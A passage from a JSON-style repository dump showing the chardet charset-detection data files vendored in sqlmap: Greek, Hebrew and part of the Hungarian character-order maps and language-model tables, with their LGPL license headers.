,0,1,0,0,0,0,0,0,\n0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,2,0,0,2,2,0,0,0,0,1,0,0,0,0,0,0,2,\n0,2,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,\n0,2,2,2,2,0,0,0,3,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,1,\n0,0,2,0,0,0,0,1,2,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,\n0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,2,2,2,0,0,0,2,0,0,0,0,0,0,0,0,2,\n0,0,1,0,0,0,0,2,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,\n0,3,0,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,2,\n0,0,2,0,0,0,0,2,2,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,0,2,2,1,0,0,0,0,0,0,2,0,0,2,0,2,2,2,0,0,0,0,0,0,2,0,0,0,0,2,\n0,0,2,0,0,2,0,2,2,0,0,0,0,2,0,2,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,\n0,0,3,0,0,0,2,2,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,0,0,\n0,2,2,2,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,\n0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n0,2,0,0,0,2,0,0,0,0,0,1,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,2,0,0,0,\n0,2,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,2,0,2,0,0,0,\n0,0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,1,2,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n)\n\nLatin7GreekModel = {\n  'char_to_order_map': Latin7_char_to_order_map,\n  'precedence_matrix': GreekLangModel,\n  'typical_positive_ratio': 0.982851,\n  'keep_english_letter': False,\n  'charset_name': \"ISO-8859-7\",\n  'language': 'Greek',\n}\n\nWin1253GreekModel = {\n  'char_to_order_map': win1253_char_to_order_map,\n  'precedence_matrix': GreekLangModel,\n  'typical_positive_ratio': 0.982851,\n  'keep_english_letter': False,\n  'charset_name': \"windows-1253\",\n  'language': 'Greek',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langhebrewmodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n#          Simon Montagu\n# Portions created by the Initial Developer are Copyright (C) 2005\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#   Shoshannah Forbes - original C code (?)\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# Windows-1255 language model\n# Character Mapping Table:\nWIN1255_CHAR_TO_ORDER_MAP = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 69, 91, 79, 80, 92, 89, 97, 90, 68,111,112, 82, 73, 95, 85,  # 40\n 78,121, 86, 71, 67,102,107, 84,114,103,115,253,253,253,253,253,  # 50\n253, 50, 74, 60, 61, 42, 76, 70, 64, 53,105, 93, 56, 65, 54, 49,  # 60\n 66,110, 51, 43, 44, 63, 81, 77, 98, 75,108,253,253,253,253,253,  # 70\n124,202,203,204,205, 40, 58,206,207,208,209,210,211,212,213,214,\n215, 83, 52, 47, 46, 72, 32, 94,216,113,217,109,218,219,220,221,\n 34,116,222,118,100,223,224,117,119,104,125,225,226, 87, 99,227,\n106,122,123,228, 55,229,230,101,231,232,120,233, 48, 39, 57,234,\n 30, 59, 41, 88, 33, 37, 36, 31, 29, 35,235, 62, 28,236,126,237,\n238, 38, 45,239,240,241,242,243,127,244,245,246,247,248,249,250,\n  9,  8, 20, 16,  3,  2, 24, 14, 22,  1, 25, 15,  4, 11,  6, 23,\n 12, 19, 13, 26, 18, 27, 21, 17,  7, 10,  5,251,252,128, 96,253,\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 98.4004%\n# first 1024 sequences: 1.5981%\n# rest  sequences:      0.087%\n# negative sequences:   0.0015%\nHEBREW_LANG_MODEL = (\n0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0,\n3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,\n1,2,1,2,1,2,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,\n1,2,1,3,1,1,0,0,2,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,1,2,2,1,3,\n1,2,1,1,2,2,0,0,2,2,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,2,2,2,3,2,\n1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,3,2,2,3,2,2,2,1,2,2,2,2,\n1,2,1,1,2,2,0,1,2,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,0,2,2,2,2,2,\n0,2,0,2,2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,0,2,2,2,\n0,2,1,2,2,2,0,0,2,1,0,0,0,0,1,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,2,1,2,3,2,2,2,\n1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,\n3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,2,0,2,\n0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,2,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,2,2,3,2,1,2,1,1,1,\n0,1,1,1,1,1,3,0,1,0,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0,\n0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,\n0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,2,3,3,3,2,1,2,3,3,2,3,3,3,3,2,3,2,1,2,0,2,1,2,\n0,2,0,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,\n3,3,3,3,3,3,3,3,3,2,3,3,3,1,2,2,3,3,2,3,2,3,2,2,3,1,2,2,0,2,2,2,\n0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,2,2,3,3,3,3,1,3,2,2,2,\n0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,2,3,2,2,2,1,2,2,0,2,2,2,2,\n0,2,0,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,1,3,2,3,3,2,3,3,2,2,1,2,2,2,2,2,2,\n0,2,1,2,1,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,2,3,2,3,3,2,3,3,3,3,2,3,2,3,3,3,3,3,2,2,2,2,2,2,2,1,\n0,2,0,1,2,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,2,1,2,3,3,3,3,3,3,3,2,3,2,3,2,1,2,3,0,2,1,2,2,\n0,2,1,1,2,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,2,0,\n3,3,3,3,3,3,3,3,3,2,3,3,3,3,2,1,3,1,2,2,2,1,2,3,3,1,2,1,2,2,2,2,\n0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,0,2,3,3,3,1,3,3,3,1,2,2,2,2,1,1,2,2,2,2,2,2,\n0,2,0,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,2,3,3,3,2,2,3,3,3,2,1,2,3,2,3,2,2,2,2,1,2,1,1,1,2,2,\n0,2,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,\n1,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,2,3,3,2,3,1,2,2,2,2,3,2,3,1,1,2,2,1,2,2,1,1,0,2,2,2,2,\n0,1,0,1,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,\n3,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,2,0,\n0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,1,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n3,2,2,1,2,2,2,2,2,2,2,1,2,2,1,2,2,1,1,1,1,1,1,1,1,2,1,1,0,3,3,3,\n0,3,0,2,2,2,2,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n2,2,2,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,1,2,2,2,1,1,1,2,0,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,0,0,0,0,\n0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,1,0,2,1,0,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n0,3,1,1,2,2,2,2,2,1,2,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,0,1,1,1,1,0,\n0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,1,1,1,1,2,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,\n0,0,2,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0,\n2,1,1,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,1,2,1,2,1,1,1,1,0,0,0,0,\n0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,2,1,2,2,2,2,2,2,2,2,2,2,1,2,1,2,1,1,2,1,1,1,2,1,2,1,2,0,1,0,1,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,1,2,2,2,1,2,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,2,1,2,1,1,0,1,0,1,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,1,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,\n0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,2,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0,\n0,1,1,1,2,1,2,2,2,0,2,0,2,0,1,1,2,1,1,1,1,2,1,0,1,1,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,1,0,0,0,0,0,1,0,1,2,2,0,1,0,0,1,1,2,2,1,2,0,2,0,0,0,1,2,0,1,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,2,0,2,1,2,0,2,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,1,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,1,2,2,0,0,1,0,0,0,1,0,0,1,\n1,1,2,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,2,1,\n0,2,0,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1,\n2,0,1,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,2,1,1,2,0,1,0,0,0,1,1,0,1,\n1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,0,0,2,1,1,2,0,2,0,0,0,1,1,0,1,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,2,2,1,2,1,1,0,1,0,0,0,1,1,0,1,\n2,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,2,1,1,1,0,2,1,1,0,0,0,2,1,0,1,\n1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,0,2,1,1,0,1,0,0,0,1,1,0,1,\n2,2,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,0,1,2,1,0,2,0,0,0,1,1,0,1,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,\n0,1,0,0,2,0,2,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,\n1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,2,1,1,1,1,1,0,1,0,0,0,0,1,0,1,\n0,1,1,1,2,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0,\n)\n\nWin1255HebrewModel = {\n  'char_to_order_map': WIN1255_CHAR_TO_ORDER_MAP,\n  'precedence_matrix': HEBREW_LANG_MODEL,\n  'typical_positive_ratio': 0.984004,\n  'keep_english_letter': False,\n  'charset_name': \"windows-1255\",\n  'language': 'Hebrew',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langhungarianmodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# Character Mapping Table:\nLatin2_HungarianCharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47,\n 46, 71, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253,\n253,  2, 18, 26, 17,  1, 27, 12, 20,  9, 22,  7,  6, 13,  4,  8,\n 23, 67, 10,  5,  3, 21, 19, 65, 62, 16, 11,253,253,253,253,253,\n159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,\n175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,\n191,192,193,194,195,196,197, 75,198,199,200,201,202,203,204,205,\n 79,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,\n221, 51, 81,222, 78,223,224,225,226, 44,227,228,229, 61,230,231,\n232,233,234, 58,235, 66, 59,236,237,238, 60, 69, 63,239,240,241,\n 82, 14, 74,242, 70, 80,243, 72,244, 15, 83, 77, 84, 30, 76, 85,\n245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253,\n)\n\nwin1250HungarianCharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47,\n 46, 72, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253,\n253,  2, 18, 26, 17,  1, 27, 12, 20,  9, 22,  7,  6, 13,  4,  8,\n 23, 67, 10,  5,  3, 21, 19, 65, 62, 16, 11,253,253,253,253,253,\n161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,\n177,178,179,180, 78,181, 69,182,183,184,185,186,187,188,189,190,\n191,192,193,194,195,196,197, 76,198,199,200,201,202,203,204,205,\n 81,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,\n221, 51, 83,222, 80,223,224,225,226, 44,227,228,229, 61,230,231,\n232,233,234, 58,235, 66, 59,236,237,238, 60, 70, 63,239,240,241,\n 84, 14, 75,242, 71, 82,243, 73,244, 15, 85, 79, 86, 30, 77, 87,\n245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253,\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 94.7368%\n# first 1024 sequences:5.2623%\n# rest  sequences:     0.8894%\n# negative sequences:  0.0009%\nHungarianLangModel = (\n0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,\n3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2,\n3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,\n3,2,1,3,3,3,3,3,2,3,3,3,3,3,1,1,2,3,3,3,3,3,3,3,1,1,3,2,0,1,1,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,1,1,2,3,3,3,1,3,3,3,3,3,1,3,3,2,2,0,3,2,3,\n0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,3,3,2,3,3,2,2,3,2,3,2,0,3,2,2,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,\n3,3,3,3,3,3